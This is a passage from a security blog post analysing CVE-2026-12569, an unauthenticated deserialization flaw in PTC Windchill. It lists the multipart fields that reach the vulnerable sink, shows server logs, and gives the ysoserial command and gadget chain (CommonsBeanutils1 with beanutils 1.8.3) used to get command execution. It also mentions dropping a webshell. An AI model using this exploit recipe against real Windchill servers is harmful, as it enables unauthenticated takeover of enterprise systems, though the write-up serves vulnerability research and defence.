<span class="k">if</span> <span class="o">(</span><span class="n">string5</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="s">"1"</span><span class="o">))</span> <span class="o">{</span>                                          <span class="c1">// 1730</span>
    <span class="nc">Object</span> <span class="n">object2</span> <span class="o">=</span> <span class="nc">Encoder</span><span class="o">.</span><span class="na">decode</span><span class="o">(</span><span class="n">string10</span><span class="o">);</span>   <span class="c1">// ← deserialization trigger! 1755</span>
    <span class="k">if</span> <span class="o">(</span><span class="n">object2</span> <span class="k">instanceof</span> <span class="nc">ConfigSpec</span><span class="o">)</span> <span class="o">...</span>
    <span class="k">else</span> <span class="nf">if</span> <span class="o">(</span><span class="n">object2</span> <span class="k">instanceof</span> <span class="nc">NavigationCriteria</span><span class="o">)</span> <span class="o">...</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Reaching the deserialization branch requires only three multipart fields:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Field name</th>
      <th>Value</th>
      <th>Purpose</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">dataSourceType</code></td>
      <td><code class="language-plaintext highlighter-rouge">1</code></td>
      <td>Enter the ConfigSpec branch</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">objRef</code></td>
      <td>any non-empty string</td>
      <td>Otherwise returns early (used only after deserialization, does not affect triggering)</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">config_spec</code></td>
      <td>base64(serialized gadget)</td>
      <td>Fed to <code class="language-plaintext highlighter-rouge">Encoder.decode</code></td>
    </tr>
  </tbody>
</table></div>

<p><code class="language-plaintext highlighter-rouge">wt.util.Encoder.decode(String)</code> is a one-liner:</p>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="kd">public</span> <span class="kd">static</span> <span class="nc">Object</span> <span class="nf">decode</span><span class="o">(</span><span class="nc">String</span> <span class="n">s</span><span class="o">)</span> <span class="o">{</span>
    <span class="k">return</span> <span class="k">new</span> <span class="nf">Encoder</span><span class="o">().</span><span class="na">setInput</span><span class="o">(</span><span class="n">s</span><span class="o">).</span><span class="na">readObject</span><span class="o">();</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The internal <code class="language-plaintext highlighter-rouge">DecodeObjectInputStream extends ObjectInputStream</code> ultimately calls the native <code class="language-plaintext highlighter-rouge">readObject()</code>. This <code class="language-plaintext highlighter-rouge">ObjectInputStream</code> calls no <code class="language-plaintext highlighter-rouge">setObjectInputFilter</code> and overrides no <code class="language-plaintext highlighter-rouge">resolveClass</code> for a whitelist — a standard Java deserialization call site with zero filtering.</p>

<p>There is a pitfall here that is easy to misjudge. The <code class="language-plaintext highlighter-rouge">wt.verification</code> package contains <code class="language-plaintext highlighter-rouge">CallContext.computeTrustForObjectInput</code> and <code class="language-plaintext highlighter-rouge">ObjectInputTrust</code>, which at first glance look like deserialization filters. But reading the source: <code class="language-plaintext highlighter-rouge">computeTrustForObjectInput</code> merely saves/restores an object reference in a ThreadLocal, neither wrapping nor filtering the ObjectInputStream; <code class="language-plaintext highlighter-rouge">ObjectInputTrust.isTrusted()</code> only checks ObjectInput reference equality, not class filtering; and the whole mechanism is based on the RMI client host. This vulnerability goes through HTTP multipart → <code class="language-plaintext highlighter-rouge">Encoder.decode</code> and never touches the RMI trust chain. So this mechanism provides no protection against this vulnerability.</p>

<h2 id="runtime-verification"><span class="me-2">Runtime Verification</span><a href="#runtime-verification" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>From the code, the sink exists and is unfiltered. But static analysis can only say “it looks like it would run”; to confirm the sink is actually reachable, the cleanest approach is to send a harmless garbage string — no gadget — and trigger its “malformed” path. If the server actually tries to deserialize the garbage, it throws a format exception, and the exception’s stack trace proves the sink was hit. Below is the MethodServer log from this probe (PID 5480, raw and unmodified):</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>2026-07-07 10:04:39,384 ERROR wt.wvs.publish.Publish - Unexpected exception
    at wt.util.Encoder$DecodeObjectInputStream.&lt;init&gt;(Encoder.java:245)
    at wt.util.Encoder.setInput(Encoder.java:132)
    at wt.util.Encoder.decode(Encoder.java:77)
    at com.ptc.wvs.server.publish.Publish.doPublishRep(Publish.java:3125)
</pre></td></tr></tbody></table></code></div></div>

<p>The stack trace precisely hits <code class="language-plaintext highlighter-rouge">Publish.doPublishRep → Encoder.decode → setInput → DecodeObjectInputStream.&lt;init&gt;</code>. The next line is even more decisive:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>java.io.StreamCorruptedException: invalid stream header: 4C7212FC
    at java.io.ObjectInputStream.readStreamHeader(ObjectInputStream.java:806)
    at java.io.ObjectInputStream.&lt;init&gt;(ObjectInputStream.java:299)
    at wt.util.Encoder$DecodeObjectInputStream.&lt;init&gt;(Encoder.java:245)
    at wt.util.Encoder.decode(Encoder.java:77)
</pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">4C7212FC</code> is the first 4 bytes of the garbage string after base64 decoding; it does not equal the Java serialization magic <code class="language-plaintext highlighter-rouge">AC ED 00 05</code>, so <code class="language-plaintext highlighter-rouge">ObjectInputStream.readStreamHeader</code> rejects it. This shows the <code class="language-plaintext highlighter-rouge">ObjectInputStream</code> was actually created (not XML/JSON parsing) and <code class="language-plaintext highlighter-rouge">Encoder</code>’s base64 decoding is executing. What remains is just a valid serialized payload: replace <code class="language-plaintext highlighter-rouge">4C7212FC</code> with the correct <code class="language-plaintext highlighter-rouge">AC ED 00 05</code> + gadget bytes, the stream-header check passes, <code class="language-plaintext highlighter-rouge">readObject()</code> executes, and RCE is established. No gadget was delivered at all — a single malformed string proved the sink is reachable.</p>

<h2 id="gadget-selection"><span class="me-2">Gadget Selection</span><a href="#gadget-selection" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Sink reachability is confirmed, but that only means the deserialization flow will execute. To actually trigger command execution, a gadget chain that runs on the target classpath is still needed.</p>

<h3 id="failure-1-commonscollections6-blocked-by-cc-322-built-in-protection"><span class="me-2">Failure 1: CommonsCollections6 blocked by CC 3.2.2 built-in protection</span><a href="#failure-1-commonscollections6-blocked-by-cc-322-built-in-protection" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Delivered ysoserial <code class="language-plaintext highlighter-rouge">CommonsCollections6 "calc.exe"</code> (1281 bytes). Server log:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>java.lang.UnsupportedOperationException: Serialization support for
org.apache.commons.collections.functors.InvokerTransformer is disabled
for security reasons. To enable it set system property
'org.apache.commons.collections.enableUnsafeSerialization' to 'true'...
    at org.apache.commons.collections.functors.InvokerTransformer.readObject(InvokerTransformer.java:164)
    at org.apache.commons.collections.map.LazyMap.readObject(LazyMap.java:150)
    at wt.util.Encoder.decode(Encoder.java:77)
</pre></td></tr></tbody></table></code></div></div>

<p>The environment bundles Apache Commons-Collections 3.2.2 (in <code class="language-plaintext highlighter-rouge">ie3rdpartylibs.jar</code>, confirmed via pom.properties). 3.2.2 adds official protection to the <code class="language-plaintext highlighter-rouge">readObject()</code> of all functors classes (<code class="language-plaintext highlighter-rouge">InvokerTransformer</code>, <code class="language-plaintext highlighter-rouge">InstantiateTransformer</code>, <code class="language-plaintext highlighter-rouge">CloneTransformer</code>, etc.) — checking the system property <code class="language-plaintext highlighter-rouge">org.apache.commons.collections.enableUnsafeSerialization</code>, defaulting to <code class="language-plaintext highlighter-rouge">false</code> and throwing <code class="language-plaintext highlighter-rouge">UnsupportedOperationException</code>. This is the patch Apache added specifically to block CC chains, corresponding to the fix for CVE-2015-7501.</p>

<p>Note where the protection sits: during deserialization, not before it. The request did enter <code class="language-plaintext highlighter-rouge">ObjectInputStream</code> and did begin reconstructing the object graph, only to be blocked at <code class="language-plaintext highlighter-rouge">InvokerTransformer</code>’s own <code class="language-plaintext highlighter-rouge">readObject</code>. Looked at another way, this actually confirms the deserialization flow ran and the sink is reachable — a chain that does not depend on CC functors is what is needed. CC1/CC5/CC6/CC7 all depend on functors, so the entire family is out.</p>

<p>There is a common pitfall here: many automated scanners or semi-automated tools detect commons-collections on the classpath and assume the CC chains are usable. In this environment that judgment fails 100% of the time. The CC version must be confirmed — 3.2.2 / 4.1 and above carry built-in functors protection that disables the entire CC family.</p>

<h3 id="failure-2-commonsbeanutils1-serialversionuid-mismatch"><span class="me-2">Failure 2: CommonsBeanutils1 serialVersionUID mismatch</span><a href="#failure-2-commonsbeanutils1-serialversionuid-mismatch" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Turning to <code class="language-plaintext highlighter-rouge">CommonsBeanutils1</code>, delivered directly with the ysoserial default:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>java.io.InvalidClassException: org.apache.commons.beanutils.BeanComparator;
local class incompatible: stream classdesc serialVersionUID = -2044202215314119608,
local class serialVersionUID = -3490850999041592962
</pre></td></tr></tbody></table></code></div></div>

<p>ysoserial embeds the <code class="language-plaintext highlighter-rouge">BeanComparator</code> for commons-beanutils 1.9.x (SUID <code class="language-plaintext highlighter-rouge">-2044202215314119608</code>), while the environment’s Windchill bundles 1.8.3 (confirmed from <code class="language-plaintext highlighter-rouge">wc3rdpartylibs.jar</code>’s pom.properties), SUID <code class="language-plaintext highlighter-rouge">-3490850999041592962</code>. The mismatch causes the JDK SUID check to reject before deserialization.</p>

<p>A note on SUID checking. On serialization, each serializable class writes a 64-bit SUID into the stream — either an explicitly declared <code class="language-plaintext highlighter-rouge">serialVersionUID</code> or a hash auto-computed by the JVM from the class structure. On deserialization, <code class="language-plaintext highlighter-rouge">ObjectStreamClass</code> compares the stream SUID with the local class’s SUID and throws <code class="language-plaintext highlighter-rouge">InvalidClassException</code> on mismatch, rejecting before any object is reconstructed, and it cannot be bypassed. ysoserial fixes the 1.9.x <code class="language-plaintext highlighter-rouge">BeanComparator</code> at packaging time; Windchill 11.0 M030 uses 1.8.3, and the class structure changed subtly between the two versions (presumably the generic parameter <code class="language-plaintext highlighter-rouge">BeanComparator&lt;T&gt;</code>), so the auto-computed SUID differs. Such SUID mismatches are very common in enterprise Java applications using older dependency versions and are the top reason default ysoserial payloads fail.</p>

<p>The good news is that <code class="language-plaintext highlighter-rouge">BeanComparator</code> (1.8.3) itself has no readObject protection, unlike <code class="language-plaintext highlighter-rouge">InvokerTransformer</code> — only the version is off. Regenerating with 1.8.3 fixes it.</p>

<h3 id="success-regenerating-cb1-with-commons-beanutils-183-command-execution"><span class="me-2">Success: Regenerating CB1 with commons-beanutils 1.8.3, command execution</span><a href="#success-regenerating-cb1-with-commons-beanutils-183-command-execution" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Place the 1.8.3 jar at the front of the classpath to override ysoserial’s embedded 1.9.x:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>curl <span class="nt">-o</span> commons-beanutils-1.8.3.jar <span class="se">\</span>
  https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar

java <span class="nt">-cp</span> <span class="s2">"commons-beanutils-1.8.3.jar;commons-collections-3.2.2.jar;</span><span class="se">\</span><span class="s2">
commons-logging-1.2.jar;ysoserial-all.jar"</span> <span class="se">\</span>
  ysoserial.GeneratePayload CommonsBeanutils1 <span class="s2">"calc.exe"</span> <span class="o">&gt;</span> payload.bin
</pre></td></tr></tbody></table></code></div></div>

<p>Why does putting the 1.8.3 jar at the front fix it? Because ysoserial loads <code class="language-plaintext highlighter-rouge">BeanComparator</code> via <code class="language-plaintext highlighter-rouge">Class.forName</code> when generating the payload and writes the actual SUID of that class in the current JVM into the stream. With the 1.8.3 jar at the front of the classpath, the loaded <code class="language-plaintext highlighter-rouge">BeanComparator</code> is the 1.8.3 one, and its SUID naturally matches the target. Using the exact same dependency version on both the generation side and the target side is the most reliable way to align the SUID. In practice, once the target’s <code class="language-plaintext highlighter-rouge">WEB-INF/lib/*.jar</code> files are obtained, they should be placed at the very front of the generation tool’s classpath.</p>

<p>SUID alignment verified:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>BeanComparator SUID in payload = -3490850999041592962
Windchill local SUID           = -3490850999041592962
→ exact match
</pre></td></tr></tbody></table></code></div></div>

<p>After delivery, <code class="language-plaintext highlighter-rouge">calc.exe</code> launched on the target — command execution established:</p>

<p><a href="/assets/img/20260708/005.png" class="popup img-link  shimmer"><img src="/assets/img/20260708/005.png" alt="" loading="lazy"></a></p>

<p>Swapping the payload command to write a JSP file likewise drops a webshell into a web-readable directory; testing confirmed command execution with <code class="language-plaintext highlighter-rouge">pdm11\administrator</code> privileges — once the command-execution channel is established, further exploitation is just changing the payload content, not elaborated here.</p>

<p><a href="/assets/img/20260708/006.png" class="popup img-link  shimmer"><img src="/assets/img/20260708/006.png" alt="" loading="lazy"></a></p>

<h3 id="suid-cross-version-mapping"><span class="me-2">SUID cross-version mapping</span><a href="#suid-cross-version-mapping" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>The 1.8.3 issue is resolved, but the next question: which commons-beanutils version do other Windchill versions (11.1/11.2/12.x/13.x) bundle, and do their SUIDs match 1.8.3? If not, a payload baked into a PoC would fail against other versions.</p>

<p>Testing multiple commons-beanutils versions, computing each <code class="language-plaintext highlighter-rouge">BeanComparator</code> SUID with the JDK-bundled <code class="language-plaintext highlighter-rouge">serialver</code>:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>serialver <span class="nt">-classpath</span> commons-beanutils-X.Y.Z.jar org.apache.commons.beanutils.BeanComparator
</pre></td></tr></tbody></table></code></div></div>

<p>The result is very regular:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>commons-beanutils version</th>
      <th>BeanComparator SUID</th>
      <th style="text-align: center">Compatible with Windchill 11.0 (1.8.3)?</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>1.8.0</td>
      <td><code class="language-plaintext highlighter-rouge">-3490850999041592962</code></td>
      <td style="text-align: center">same</td>
    </tr>
    <tr>
      <td>1.8.2</td>
      <td><code class="language-plaintext highlighter-rouge">-3490850999041592962</code></td>
      <td style="text-align: center">same</td>
    </tr>
    <tr>
      <td><strong>1.8.3</strong></td>
      <td><strong><code class="language-plaintext highlighter-rouge">-3490850999041592962</code></strong></td>
      <td style="text-align: center">same (test environment)</td>
    </tr>
    <tr>
      <td>1.9.2</td>
      <td><code class="language-plaintext highlighter-rouge">-2044202215314119608</code></td>
      <td style="text-align: center">different</td>
    </tr>
    <tr>
      <td>1.9.3</td>
      <td><code class="language-plaintext highlighter-rouge">-2044202215314119608</code></td>
      <td style="text-align: center">different</td>
    </tr>
    <tr>
      <td>1.9.4</td>
      <td><code class="language-plaintext highlighter-rouge">-2044202215314119608</code></td>
      <td style="text-align: center">different</td>
    </tr>
  </tbody>
</table></div>

<p>SUID is stable within a major version series and only changes across majors. The entire 1.8.x series shares one, and 1.9.x shares another. This is related to <code class="language-plaintext highlighter-rouge">BeanComparator</code> not explicitly declaring a <code class="language-plaintext highlighter-rouge">serialVersionUID</code> (verifiable with <code class="language-plaintext highlighter-rouge">javap -p</code>); the SUID is auto-computed by the JVM from the class structure, and the structure changed between 1.8 and 1.9, while within a series the structure is unchanged and the SUID stays stable.</p>

<h2 id="final-chain-and-wire-format"><span class="me-2">Final Chain and Wire Format</span><a href="#final-chain-and-wire-format" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Two failures and one success — the chain that finally worked (CommonsBeanutils1, beanutils 1.8.3):</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>ObjectInputStream.readObject()
  └─ PriorityQueue.readObject()                 // heapify → triggers comparison
       └─ BeanComparator.compare()              // commons-beanutils 1.8.3 (SUID aligned, no readObject protection)
            └─ PropertyUtils.getProperty()      // reflective property "outputProperties"
                 └─ TemplatesImpl.getOutputProperties()   // JDK 1.8.0_60 built-in (trigger)
                      └─ TemplatesImpl.newTransformer()
                           └─ defineClass(malicious bytecode)     // load and instantiate
                                └─ Runtime.exec("calc.exe")  // command execution
</pre></td></tr></tbody></table></code></div></div>

<p>The key to bypassing CC 3.2.2 protection is that this chain never touches commons-collections functors: <code class="language-plaintext highlighter-rouge">BeanComparator</code> (1.8.3) has no readObject protection and is passable once the SUID is aligned; <code class="language-plaintext highlighter-rouge">TemplatesImpl</code> is a JDK 1.8.0_60 built-in class with no version issue. The <code class="language-plaintext highlighter-rouge">BeanComparator</code> + <code class="language-plaintext highlighter-rouge">TemplatesImpl</code> combination applies to any environment where “CC is patched but beanutils is not”.</p>

<p>The chain is ready; the next question is how to fit its serialized bytes into an HTTP request so the server reconstructs them correctly. That depends on <code class="language-plaintext highlighter-rouge">wt.util.Encoder</code>’s wire format. The deserialization data is not raw Java serialization bytes but is custom-wrapped by <code class="language-plaintext highlighter-rouge">Encoder</code>: base64-encoded (the full serialization byte stream, including the magic <code class="language-plaintext highlighter-rouge">AC ED 00 05</code>), placed in the multipart form’s <code class="language-plaintext highlighter-rouge">config_spec</code> field (a plain text field, not a file upload). <code class="language-plaintext highlighter-rouge">Encoder.setInput(String)</code> decodes by first calling <code class="language-plaintext highlighter-rouge">resetStream()</code> to rewrite the magic, skipping the first 4 input bytes, then base64-decoding the rest. Constructing the payload is just base64-encoding the full ysoserial output (including the magic bytes). <code class="language-plaintext highlighter-rouge">config_spec</code> must follow <code class="language-plaintext highlighter-rouge">Encoder</code>’s format, otherwise <code class="language-plaintext highlighter-rouge">readObject</code> throws <code class="language-plaintext highlighter-rouge">StreamCorruptedException</code> due to stream-header misalignment (the source of the <code class="language-plaintext highlighter-rouge">4C7212FC</code> log line above) instead of triggering the gadget.</p>

<h2 id="methodology-review"><span class="me-2">Methodology Review</span><a href="#methodology-review" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Stage</th>
      <th>Finding</th>
      <th>Significance</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Apache config audit</td>
      <td><code class="language-plaintext highlighter-rouge">WindchillGW</code> explicitly <code class="language-plaintext highlighter-rouge">Require all granted</code></td>
      <td>Locate the unauthenticated entry</td>
    </tr>
    <tr>
      <td>Reflective dispatch analysis</td>
      <td>path_info split directly into class/method for reflective call</td>
      <td>Explains arbitrary-method reachability</td>
    </tr>
    <tr>
      <td>Harmless garbage-string probe</td>
      <td><code class="language-plaintext highlighter-rouge">StreamCorruptedException: 4C7212FC</code></td>
      <td>Non-destructive proof of sink reachability</td>
    </tr>
    <tr>
      <td>CC6 delivery</td>
      <td><code class="language-plaintext highlighter-rouge">UnsupportedOperationException</code> from CC’s own protection</td>
      <td>Determines the entire CC family is unusable; switch chains</td>
    </tr>
    <tr>
      <td>CB1 default delivery</td>
      <td><code class="language-plaintext highlighter-rouge">InvalidClassException</code> SUID mismatch</td>
      <td>Locates the cause of default ysoserial payload failure</td>
    </tr>
    <tr>
      <td>Batch serialver measurement</td>
      <td>SUID distributed by version family</td>
      <td>Baked payloads only need family-level coverage</td>
    </tr>
  </tbody>
</table></div>

<h2 id="timeline"><span class="me-2">Timeline</span><a href="#timeline" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Date</th>
      <th>Event</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>2026-03</td>
      <td>Predecessor CVE-2026-4681 (CVSS 10.0) disclosed</td>
    </tr>
    <tr>
      <td>2026-06-25</td>
      <td>CVE-2026-12569 added to the CISA KEV catalog</td>
    </tr>
    <tr>
      <td>2026-07-07</td>
      <td>Runtime non-destructive verification + weaponization test (calc PID 4952)</td>
    </tr>
    <tr>
      <td>2026-07-08</td>
      <td>This analysis compiled</td>
    </tr>
  </tbody>
</table></div>

<h2 id="conclusion"><span class="me-2">Conclusion</span><a href="#conclusion" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CVE-2026-12569 is a three-stage vulnerability: at the entry, <code class="language-plaintext highlighter-rouge">WindchillGW</code> is <code class="language-plaintext highlighter-rouge">Require all granted</code> at the Apache layer, anonymously reachable; in the middle, <code class="language-plaintext highlighter-rouge">HTTPServer.processRequest</code> splits <code class="language-plaintext highlighter-rouge">path_info</code> directly into class/method for reflective invocation, with neither authentication nor a whitelist; at the sink, <code class="language-plaintext highlighter-rouge">Publish.doPublishRep</code> → <code class="language-plaintext highlighter-rouge">Encoder.decode</code> → <code class="language-plaintext highlighter-rouge">ObjectInputStream.readObject()</code> applies zero filtering. Stack the three stages and an ordinary business interface becomes a stable unauthenticated command-execution channel.</p>

<p>The gadget-debugging portion shows that the success of deserialization exploitation often lies not in whether a sink exists but in whether environment version details are aligned: commons-collections on the classpath does not mean a CC chain is usable (3.2.2 built-in functors protection, the whole family out); commons-beanutils usable does not mean the default ysoserial CB1 is usable (SUID version-family differences, 1.8.x and 1.9.x each occupy one).</p>

<p>As for what protection Windchill itself applied — the CC6 log makes it clear: <code class="language-plaintext highlighter-rouge">Encoder.decode</code> → <code class="language-plaintext highlighter-rouge">ObjectInputStream</code> has no <code class="language-plaintext highlighter-rouge">ObjectInputFilter</code> and no class whitelist throughout. The CC chain was blocked by CC’s own protection, not Windchill’s. Windchill applies no protection to this deserialization point, which is the actual problem behind CVE-2026-12569. Coupled with two vulnerabilities of the same class within 90 days (CVE-2026-4681 → CVE-2026-12569), the systemic gap in governing the deserialization attack surface is plain to see.</p>

<h2 id="references"><span class="me-2">References</span><a href="#references" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-12569">NVD CVE-2026-12569</a></li>
  <li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA KEV Catalog</a> (added 2026-06-25)</li>
  <li>PTC security advisory and IOCs (source of deserialization / mitigation rules)</li>
  <li>Related vulnerability: CVE-2026-4681 (same product, 2026-03, CVSS 10.0)</li>
  <li>Similar references: CVE-2023-46604 (Apache ActiveMQ OpenWire deserialization), CVE-2023-43208 (Mirth Connect)</li>
  <li>Tools: ysoserial (gadget generation), CFR 0.152 (decompilation)</li>
  <li><a href="https://commons.apache.org/proper/commons-collections/security-reports.html">Apache Commons-Collections security reports</a></li>
</ul>

<hr />
<p><em>For authorized security testing and defensive research only.</em></p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/vulnerability/">vulnerability</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/cve/"
            class="post-tag no-text-decoration"
          >CVE</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=CVE-2026-12569%20Deep%20Dive%20Unauthenticated%20Deserialization%20RCE%20in%20PTC%20Windchill%20-%20imjdl%20blog&url=%2Fposts%2Fblog_cve_2026_12569_en%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=CVE-2026-12569%20Deep%20Dive%20Unauthenticated%20Deserialization%20RCE%20in%20PTC%20Windchill%20-%20imjdl%20blog&u=%2Fposts%2Fblog_cve_2026_12569_en%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=%2Fposts%2Fblog_cve_2026_12569_en%2F&text=CVE-2026-12569%20Deep%20Dive%20Unauthenticated%20Deserialization%20RCE%20in%20PTC%20Windchill%20-%20imjdl%20blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_9181_arcgis_cn/">CVE-2026-9181：Esri ArcGIS Server 路径遍历漏洞分析</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_9181_arcgis_en/">CVE-2026-9181 Path Traversal in Esri ArcGIS Server</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_12569_cn/">CVE-2026-12569 深度分析：PTC Windchill 未授权反序列化 RCE</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_12569_en/">CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2025_11837_cn/">CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
